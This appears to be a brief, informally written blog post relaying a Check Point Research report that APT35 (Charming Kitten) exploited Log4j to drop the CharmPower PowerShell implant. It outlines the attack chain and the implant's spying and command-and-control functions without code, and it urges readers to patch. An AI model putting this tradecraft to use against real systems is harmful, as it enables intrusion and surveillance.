It has been reported by Check Point Research that hackers sponsored by Iranian State CharmingKitten AKA APT35 has been attempting to sue Log4j vulnerability on public systems to create chaos however their attempts have been very poor and have led to easy detection. It was discovered that APT35 had been using open source Java library named JNDIExploit to attack victims and than sent a poisonous payload in a HTML Header which then builds and returns a malicious Java Class which eventually downloads a PowerShell Module called CharmPower from an Amazon S3 URL Link.
Once CharmPower module is implanted on victims machine it could do many things. It could make sure that network connection exists or collect system data. It could also install further PowerShell modules for C2C execution which could mean that screenshots could be taken from victims machine or running processes could be monitored at same time as sending logs back to remote server.
Normally with this type of attack it is normally very difficult to put blame on a group however CharmingKitten are well known to use very poor Cybersecurity practices and they have used code from a previous cyber attack again here which means blaming them is very easy. What amateurs!! 😂😂
It is clear that this is just start of Iranian regime hackers using Log4j vulnerability for their evil ways. Please friends update your systems to latest patch and stay alert for new PowerShell Script CharmPower. I will continue to investigate!!
No comments:
Post a Comment